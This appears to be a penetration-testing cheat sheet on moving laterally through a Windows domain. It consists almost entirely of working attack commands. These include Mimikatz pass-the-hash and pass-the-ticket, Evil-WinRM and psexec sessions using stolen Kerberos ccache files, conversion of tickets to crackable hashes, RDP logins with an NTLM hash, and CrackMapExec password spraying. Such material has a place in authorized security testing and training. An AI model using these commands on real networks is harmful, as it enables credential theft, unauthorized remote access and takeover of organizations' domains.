There aren't many ways to move laterally on windows. Below are the main ones.
PTH(pass the hash) can be used most of the time.
Mimikatz Ticket PTT
Enable-PSRemoting
mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP
WinRM
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp
PTH with Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'
Pass The Ccache (PTC)
Grab the ccache from remote and put into environment variable
export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX
Make sure the times are synced up with the DC
sudo ntpdate -u 192.168.1.231
Psexec to the target
impacket-psexec morph3@dc01.domain.local -dc-ip 192.168.1.231 -k -no-pass
** Don't include domain name in psexec. If you are having issues with the command you may remove the username as well.
Cracking Ccache
Convert the ccache file into kirbi file using a converter.
python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbi
Convert kirbi to crackable hash.
python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txt
RDP
Impacket's rdp_check.py script is good.
impacket-rdp_check morph3:Password123@1.3.3.7
python3 /opt/impacket/examples/rdp_check.py ecorp/morph3@1.3.3.7
xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3 /pth:08df3c74ded740e1f2bcf5dea4b8daf6 /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456
CrackMapExec
Swiss-knife tool for password spraying.
crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7 -u ./users -p ./passwords --continue-on-success --shares